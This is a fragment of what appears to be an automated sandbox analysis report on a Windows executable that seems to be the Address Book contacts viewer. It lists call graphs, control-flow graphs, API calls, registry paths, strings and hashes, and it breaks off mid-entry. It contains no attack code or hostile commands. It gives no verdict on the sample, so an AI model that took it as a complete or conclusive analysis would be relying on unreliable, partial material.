622a95 823->824 825 622a8e 823->825 824->825 826 622ac9 GetProcessHeap HeapAlloc 824->826 825->818 825->822 826->825 827 622adf 826->827 828 622ae5 memcpy 827->828 829 622aff 827->829 828->829 829->825 829->829 830 622b33 GetProcessHeap HeapFree 829->830 830->825 831->795 833 622c61 832->833 834 622ce8 832->834 837 622a7e 5 API calls 833->837 835 6232b0 4 API calls 834->835 836 622cf7 835->836 836->798 838 622c86 837->838 839 622cd4 838->839 844 622cfb 838->844 841 621ae4 2 API calls 839->841 841->834 845 622cae 844->845 846 622d0a 844->846 845->839 852 622bd5 845->852 846->845 858 622ef8 846->858 848 622d44 memset 848->845 851 622d4b memset 851->845 853 622c28 852->853 854 622be5 852->854 853->839 854->853 855 622a7e 5 API calls 854->855 856 622c0b 855->856 856->853 857 622c11 memcpy 856->857 857->853 859 622f07 858->859 861 622d2b 859->861 862 622e3f 859->862 861->848 861->851 863 622e83 862->863 864 622e8f 863->864 865 622e9f LocalAlloc 863->865 864->861 865->864 866 622eaf 865->866 867 622ee8 LocalFree 866->867 870 622deb 866->870 867->864 869 622eda 869->867 871 622e1c 870->871 872 622df8 870->872 871->869 872->871 873 622e06 IsDBCSLeadByte 872->873 873->871 873->872 880 623400 881 62343d 880->881 883 623412 880->883 882 623437 ?terminate@ 882->881 883->881 883->882 884 622f80 885 622f85 884->885 893 6234d8 GetModuleHandleW 885->893 887 622f91 __set_app_type __p__fmode __p__commode 888 622fc9 887->888 889 622fd2 __setusermatherr 888->889 890 622fde 888->890 889->890 895 62370d _controlfp 890->895 892 622fe3 894 6234e9 893->894 894->887 895->892 901 623450 SetUnhandledExceptionFilter 902 6225b0 903 6225c5 PostQuitMessage 902->903 904 6225be DefWindowProcW 902->904 904->903 905 623790 _except_handler4_common 874 623001 __getmainargs 906 6231bf _XcptFilter

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_00622B60 12 Function_00622A7E 0->12 1 Function_00621A60 2 Function_00621AE4 3 Function_00623464 32 Function_00623728 3->32 4 Function_00622DEB 5 Function_0062376D 6 Function_006237F0 7 Function_00621BF4 30 Function_006228A4 7->30 35 Function_006232B0 7->35 8 Function_00623675 9 Function_00622CFB 10 Function_00622EF8 9->10 43 Function_00622E3F 10->43 11 Function_006213F8 13 Function_00622D7F 14 Function_006237C2 22 Function_00622F51 14->22 15 Function_006232C0 16 Function_00623640 17 Function_006219C7 18 Function_0062324A 19 Function_006225D3 19->0 19->1 23 Function_00621B57 19->23 19->35 20 Function_006231D3 21 Function_00623450 23->0 24 Function_00622BD5 24->12 25 Function_006234D8 25->3 26 Function_00621C5C 26->2 26->6 26->7 26->17 26->19 29 Function_00621B21 26->29 31 Function_006229AB 26->31 34 Function_00621AB0 26->34 26->35 42 Function_0062193A 26->42 45 Function_00621B83 26->45 27 Function_00623520 28 Function_00622A21 40 Function_00622C36 29->40 30->1 30->35 31->28 33 Function_00623030 33->8 33->26 33->32 46 Function_00623580 33->46 54 Function_00623219 33->54 35->15 36 Function_00623530 37 Function_006218B0 38 Function_006225B0 39 Function_006234B1 40->2 40->9 40->12 40->24 40->34 40->35 41 Function_006234B5 42->35 43->4 43->13 44 Function_006231BF 45->30 45->35 46->16 46->36 47 Function_00623400 48 Function_00621B80 49 Function_00622F80 49->18 49->25 49->27 52 Function_0062370D 49->52 50 Function_00623001 51 Function_0062360B 53 Function_00623790 55 Function_0062361E

                                                                              Executed Functions

                                                                              Function 00621C5C Relevance: 63.6, APIs: 31, Strings: 5, Instructions: 637registrymemorywindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 621c5c-621d16 call 6237f0 memset GetCommandLineW call 621ab0 HeapSetInformation 5 621d20-621e08 call 6229ab call 621bf4 LoadStringW LoadIconW LoadCursorW RegisterClassW CreateWindowExW 0->5 6 621d18-621d1b 0->6 7 621faf 5->7 23 621e0e-621e20 call 621b83 5->23 6->7 10 621fb1-621fb9 7->10 12 621fbb-621fd5 10->12 13 621fde-621fe6 10->13 12->13 30 621fd7-621fdc 12->30 14 621fe8-622004 13->14 15 62200d-622014 13->15 14->15 31 622006-62200b 14->31 17 622560 15->17 18 62201a-622029 FreeLibrary 15->18 22 622562-622569 17->22 18->22 24 62256b-622572 FreeLibrary 22->24 25 622578-6225aa call 621ae4 * 2 call 6232b0 22->25 34 621e22 GetLastError 23->34 35 621e2f-621e45 call 6225d3 23->35 24->25 30->13 31->15 37 621e28-621e2a 34->37 35->7 42 621e4b-621e62 call 62193a 35->42 37->7 46 621ef0 42->46 47 621e68-621e76 42->47 48 621ef2-621f1d EventUnregister 46->48 47->48 49 621e78-621e88 47->49 51 621f1f-621f62 memset LoadStringW MessageBoxW 48->51 52 621f6d-621f73 48->52 49->48 50 621e8a-621e8c 49->50 50->48 53 621e8e-621eee call 6219c7 50->53 54 621f68-621f6b 51->54 55 621f79-621f8b GetProcAddress 52->55 56 62202e-622034 52->56 53->48 54->10 60 621fac-621fae 55->60 61 621f8d-621f95 55->61 58 622036 56->58 59 62206a-622070 56->59 65 622038-622048 GetProcAddress 58->65 62 622072-622074 59->62 63 622076-62207c 59->63 60->7 72 621f99-621f9b 61->72 62->65 67 622082-622084 63->67 68 62207e-622080 63->68 65->60 69 62204e-62205c 65->69 70 622086-622088 67->70 71 62208a-622098 67->71 68->65 88 622065 69->88 89 62205e-622063 69->89 70->65 73 6220b3-6220b9 71->73 74 62209a-6220a1 71->74 76 621fa4-621fa6 72->76 77 621f9d-621fa2 72->77 80 6220d4-6220da 73->80 81 6220bb-6220c2 73->81 78 6220a3-6220a9 74->78 79 6220ab-6220b1 74->79 76->37 76->60 77->76 84 62210f-622116 78->84 79->84 82 6220f5-6220fd 80->82 83 6220dc-6220e3 80->83 85 6220c4-6220ca 81->85 86 6220cc-6220d2 81->86 82->84 92 6220ff-622109 82->92 90 6220e5-6220eb 83->90 91 6220ed-6220f3 83->91 84->54 93 62211c-622130 GetProcAddress 84->93 85->84 86->84 88->60 89->88 90->84 91->84 92->84 93->54 94 622136-622179 93->94 97 622182-622186 94->97 98 62217b-622180 94->98 99 622225-622228 97->99 100 62218c-6221a7 memset 97->100 98->97 103 622251-622254 99->103 104 62222a-622247 99->104 101 6221a9-6221af 100->101 102 6221ec 100->102 105 6221b1-6221b7 101->105 106 6221e5-6221ea 101->106 109 6221f1-62221a LoadStringW 102->109 107 622281-622284 103->107 108 622256-62227f 103->108 125 62224a 104->125 110 6221b9-6221bf 105->110 111 6221de-6221e3 105->111 106->109 112 622286-622291 107->112 113 6222c7-6222ca 107->113 108->125 109->99 117 6221c1-6221d5 110->117 118 6221d7-6221dc 110->118 111->109 120 622293 112->120 121 622299-6222c5 112->121 115 6222d0-6222e4 call 621b21 113->115 116 622384-622387 113->116 115->54 132 6222ea-6222f5 115->132 122 62242a-62242d 116->122 123 62238d-62239f GetProcAddress 116->123 117->109 118->109 120->121 121->125 129 622433-622445 GetProcAddress 122->129 130 6224d0-6224d6 122->130 123->60 126 6223a5-6223c6 123->126 125->103 149 6223c8-6223cd 126->149 150 6223cf-6223d1 126->150 129->60 135 62244b-62246c 129->135 133 6224d8-6224ea GetProcAddress 130->133 134 622519-62251f 130->134 138 6222f7 132->138 139 6222fd-622320 132->139 133->60 140 6224f0-622514 133->140 134->54 136 622525-622537 GetProcAddress 134->136 151 622475-622477 135->151 152 62246e-622473 135->152 136->60 142 62253d-62255b 136->142 138->139 159 622322-622327 139->159 160 622329-62232b 139->160 140->134 142->17 149->150 150->60 153 6223d7-6223dc 150->153 151->60 156 62247d-622482 151->156 152->151 153->60 158 6223e2-62241f memset LoadStringW 153->158 156->60 161 622488-6224c5 memset LoadStringW 156->161 158->122 159->160 160->60 162 622331-622336 160->162 161->130 162->60 163 62233c-622379 memset LoadStringW 162->163 163->116
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00621CC6
                                                                              • GetCommandLineW.KERNEL32 ref: 00621CCE
                                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00621D0E
                                                                              • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00621D49
                                                                              • LoadIconW.USER32 ref: 00621D84
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00621D96
                                                                              • GetStockObject.GDI32(00000000), ref: 00621DA3
                                                                              • RegisterClassW.USER32(00000003), ref: 00621DCD
                                                                              • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00621DF8
                                                                              • GetLastError.KERNEL32 ref: 00621E22
                                                                              • FreeLibrary.KERNELBASE(?), ref: 0062201B
                                                                              • FreeLibrary.KERNELBASE(?), ref: 0062256C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                              • String ID: $API Entered$Contacts Viewer$P^)u$WABOpen
                                                                              • API String ID: 328653217-431442686
                                                                              • Opcode ID: dea4fbd0e2a46c532a5c9a730ab8ca5fa10c009641d7b985e08ae16e0ba343e5
                                                                              • Instruction ID: 4d0a9acf3f3b590fde96331178cf7792fa07f2a485ef0b5f93936f7586498f29
                                                                              • Opcode Fuzzy Hash: dea4fbd0e2a46c532a5c9a730ab8ca5fa10c009641d7b985e08ae16e0ba343e5
                                                                              • Instruction Fuzzy Hash: 9432B771900A39ABDB348F15EC95BE977BBFF54300F0440A9E90AA72A0DB749E81CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00623030 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 164 623030-623061 call 623675 call 623728 GetStartupInfoW 170 623063-623072 164->170 171 623074-623076 170->171 172 62308c-62308e 170->172 173 623078-62307d 171->173 174 62307f-62308a Sleep 171->174 175 62308f-623095 172->175 173->175 174->170 176 6230a1-6230a7 175->176 177 623097-62309f _amsg_exit 175->177 179 6230d5 176->179 180 6230a9-6230c2 call 623219 176->180 178 6230db-6230e1 177->178 182 6230e3-6230f4 _initterm 178->182 183 6230fe-623100 178->183 179->178 180->178 187 6230c4-6230d0 180->187 182->183 185 623102-623109 183->185 186 62310b-623112 183->186 185->186 188 623137-623141 186->188 189 623114-623121 call 623580 186->189 191 623209-623218 187->191 190 623144-623149 188->190 189->188 198 623123-623135 189->198 193 623195-623198 190->193 194 62314b-62314d 190->194 199 6231a6-6231b3 _ismbblead 193->199 200 62319a-6231a3 193->200 196 623164-623168 194->196 197 62314f-623151 194->197 204 623170-623172 196->204 205 62316a-62316e 196->205 197->193 203 623153-623155 197->203 198->188 201 6231b5-6231b6 199->201 202 6231b9-6231bd 199->202 200->199 201->202 202->190 206 6231ee-6231f5 202->206 203->196 207 623157-62315a 203->207 208 623173-62318c call 621c5c 204->208 205->208 212 623202 206->212 213 6231f7-6231fd _cexit 206->213 207->196 210 62315c-623162 207->210 208->206 215 62318e-62318f exit 208->215 210->203 212->191 213->212 215->193
                                                                              APIs
                                                                                • Part of subcall function 00623675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006236A2
                                                                                • Part of subcall function 00623675: GetCurrentProcessId.KERNEL32 ref: 006236B1
                                                                                • Part of subcall function 00623675: GetCurrentThreadId.KERNEL32 ref: 006236BA
                                                                                • Part of subcall function 00623675: GetTickCount.KERNEL32 ref: 006236C3
                                                                                • Part of subcall function 00623675: QueryPerformanceCounter.KERNEL32(?), ref: 006236D8
                                                                              • GetStartupInfoW.KERNEL32(?,00623838,00000058), ref: 0062304F
                                                                              • Sleep.KERNEL32(000003E8), ref: 00623084
                                                                              • _amsg_exit.MSVCRT ref: 00623099
                                                                              • _initterm.MSVCRT ref: 006230ED
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00623119
                                                                              • exit.KERNELBASE ref: 0062318F
                                                                              • _ismbblead.MSVCRT ref: 006231AA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                              • String ID:
                                                                              • API String ID: 836923961-0
                                                                              • Opcode ID: 7e574c8318d1517912fba733d28b3a9860c5aec94ee01549ad59feca1a4d554f
                                                                              • Instruction ID: f9a43facb1a993d489be64131d2ec28ec8b009b44c1b02fed0884c70319e5999
                                                                              • Opcode Fuzzy Hash: 7e574c8318d1517912fba733d28b3a9860c5aec94ee01549ad59feca1a4d554f
                                                                              • Instruction Fuzzy Hash: 2441C531A04F359BDB359F55F8097AA77E7EB14760F20001AE902A7390CF788A52CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 006228A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 216 6228a4-6228e8 memset 217 6228ee-622912 RegOpenKeyExW 216->217 218 62299d-6229aa call 6232b0 216->218 220 622914-622947 RegQueryValueExW 217->220 221 622989-62298f 217->221 220->221 224 622949-622956 220->224 221->218 222 622991-622997 RegCloseKey 221->222 222->218 225 622958-62296b ExpandEnvironmentStringsW 224->225 226 62296d-622977 GetFileAttributesW 224->226 225->221 226->221 227 622979-622984 call 621a60 226->227 227->221
                                                                              APIs
                                                                              • memset.MSVCRT ref: 006228DE
                                                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                              • RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 0062296E
                                                                              • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              Strings
                                                                              • Software\Microsoft\WAB\DLLPath, xrefs: 00622900
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                              • String ID: Software\Microsoft\WAB\DLLPath
                                                                              • API String ID: 2763597636-3156921957
                                                                              • Opcode ID: 9e19a35abcc7ed9c6d8e44d5cfa7d1296d8d76e4e5cde52f29aa2f4b535b075e
                                                                              • Instruction ID: 08a6344e3ee614243f7ffb4a57ad4d4bad47a1b84dfb9967e310f2e9416c8cdd
                                                                              • Opcode Fuzzy Hash: 9e19a35abcc7ed9c6d8e44d5cfa7d1296d8d76e4e5cde52f29aa2f4b535b075e
                                                                              • Instruction Fuzzy Hash: 8B219571D41A2DAEDB309F15DC8CEDAB7BEAF54710F00029AB419E2250D7704BC5CEA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00621BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 229 621bf4-621c26 call 6228a4 PathRemoveFileSpecW 232 621c28-621c3c PathAppendW 229->232 233 621c4d-621c5b call 6232b0 229->233 232->233 234 621c3e-621c4b LoadLibraryW 232->234 234->233
                                                                              APIs
                                                                                • Part of subcall function 006228A4: memset.MSVCRT ref: 006228DE
                                                                                • Part of subcall function 006228A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                                • Part of subcall function 006228A4: RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                                • Part of subcall function 006228A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                                • Part of subcall function 006228A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00621C1E
                                                                              • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00621C34
                                                                              • LoadLibraryW.KERNELBASE(?), ref: 00621C45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                              • String ID: wab32res.dll
                                                                              • API String ID: 1705514897-2698570859
                                                                              • Opcode ID: 6d9d047775cebefb325e4072d5270867df8f985d75b38b9bb7a5c8cf73f3fac3
                                                                              • Instruction ID: 7d7afc14c2bba4e73837e1167ebda022dbd463df81776fa22a5e6bf586fd345b
                                                                              • Opcode Fuzzy Hash: 6d9d047775cebefb325e4072d5270867df8f985d75b38b9bb7a5c8cf73f3fac3
                                                                              • Instruction Fuzzy Hash: CBF09075A02A28ABCB20EBB4AC08AAD77BAAB04300F504199A512D7241DB34DE05CE90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00621B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 237 621b83-621bc1 memset call 6228a4 240 621bc4-621bcd 237->240 240->240 241 621bcf-621bda 240->241 242 621be1-621bf3 LoadLibraryW call 6232b0 241->242 243 621bdc 241->243 243->242
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00621BA8
                                                                                • Part of subcall function 006228A4: memset.MSVCRT ref: 006228DE
                                                                                • Part of subcall function 006228A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                                • Part of subcall function 006228A4: RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                                • Part of subcall function 006228A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                                • Part of subcall function 006228A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 00621BE2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                              • String ID: wab32.dll
                                                                              • API String ID: 2792020168-2849205143
                                                                              • Opcode ID: 517c46538207e68773f6a657b8631b84b4e8ad39005a16e9471fbe506be0b697
                                                                              • Instruction ID: 3e72a1bb5db63f769f9ee8dacc48e6f3a2352ef0f041de0174ee74404e40088a
                                                                              • Opcode Fuzzy Hash: 517c46538207e68773f6a657b8631b84b4e8ad39005a16e9471fbe506be0b697
                                                                              • Instruction Fuzzy Hash: ABF0217540163857CF34EB64EC5DAEA777ADF50300F904198E8179B281EA345F49CE84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 006229AB Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 246 6229ab-6229ca CommandLineToArgvW 247 622a15 246->247 248 6229cc-6229ea call 622a21 LocalFree 246->248 250 622a1a-622a20 247->250 248->250 252 6229ec-622a03 call 622a21 248->252 255 622a05 252->255 256 622a08-622a13 RegisterApplicationRestart 252->256 255->256 256->250
                                                                              APIs
                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 006229C0
                                                                              • LocalFree.KERNEL32(00000000,?), ref: 006229DE
                                                                              • RegisterApplicationRestart.KERNELBASE(00621428,00000000,00000000), ref: 00622A0B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                              • String ID:
                                                                              • API String ID: 3182635576-0
                                                                              • Opcode ID: 86cd3502429fe9d3a745406c55240806cf7f52f5f02cf22fa1feff7a89246978
                                                                              • Instruction ID: c7f33df64b7b811fad25f3ef64ac761c9cd03aef852828b313c21d99a929bd56
                                                                              • Opcode Fuzzy Hash: 86cd3502429fe9d3a745406c55240806cf7f52f5f02cf22fa1feff7a89246978
                                                                              • Instruction Fuzzy Hash: 7201B572900A2ABBDB21CBD4ECD8BADB7BDEB44361F500165E501E7200DB749E01CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00623001 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 257 623001-623022 __getmainargs
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: __getmainargs
                                                                              • String ID:
                                                                              • API String ID: 3565562838-0
                                                                              • Opcode ID: 0ab45844629f2843bd0f1f85e2239451402639986d046c76ecb9fdccb2cc4791
                                                                              • Instruction ID: d949c371cedf908f9fb8e0a2786797424920bc495f72f256522f233d28b9bd39
                                                                              • Opcode Fuzzy Hash: 0ab45844629f2843bd0f1f85e2239451402639986d046c76ecb9fdccb2cc4791
                                                                              • Instruction Fuzzy Hash: D9C08CB1540E90AB8320DB54BC03B803712EA517007030054A322A70A1DE680086CE69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 006225D3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 211COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 258 6225d3-62265b memset * 2 CommandLineToArgvW 259 622891-6228a1 call 6232b0 258->259 260 622661-622667 258->260 261 62287d-622886 LocalFree 260->261 262 62266d-622674 260->262 261->259 264 622888-622890 261->264 265 622683-62269e StrCmpNIW 262->265 266 622676-62267e 262->266 264->259 268 6226f0-6226f9 265->268 269 6226a0-6226a7 265->269 266->261 270 622757-62275f 268->270 271 6226fb-62271c call 621a60 PathFindExtensionW 268->271 272 6226aa-6226b3 269->272 274 622761-622770 StrCmpIW 270->274 281 62271e-62272e StrCmpIW 271->281 272->272 275 6226b5-6226b9 272->275 277 622772-622781 274->277 278 622785-6227a2 274->278 279 622736-62273c 275->279 280 6226bb-6226bd 275->280 277->274 283 622783 277->283 286 622873-622875 278->286 287 6227a8-6227b0 278->287 282 622877 279->282 284 6226cf-6226dd 280->284 285 6226bf-6226cd call 621b57 280->285 288 622730-622734 281->288 289 622741-622751 281->289 282->261 283->279 284->261 293 6226e3-6226eb 284->293 285->284 286->282 291 6227b2-6227b5 287->291 292 6227c5-6227e3 call 621a60 GetFileAttributesW 287->292 288->279 288->281 289->270 296 6227b7-6227be 291->296 297 622818-622825 291->297 302 622833-622835 292->302 303 6227e5-6227ec 292->303 293->261 296->297 298 6227c0 296->298 300 622827-62282a 297->300 301 62282c-622831 297->301 298->292 300->292 301->261 306 622840-622848 302->306 307 622837-62283e 302->307 304 622811-622816 303->304 305 6227ee-6227fd PathRemoveFileSpecW 303->305 304->282 305->304 308 6227ff-62280f GetFileAttributesW 305->308 309 62284b-622854 306->309 307->304 307->306 308->302 308->304 309->309 310 622856-622871 call 622b60 309->310 310->282 310->286
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0062261B
                                                                              • memset.MSVCRT ref: 00622633
                                                                              • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0062264D
                                                                              • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 0062268D
                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 0062287E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
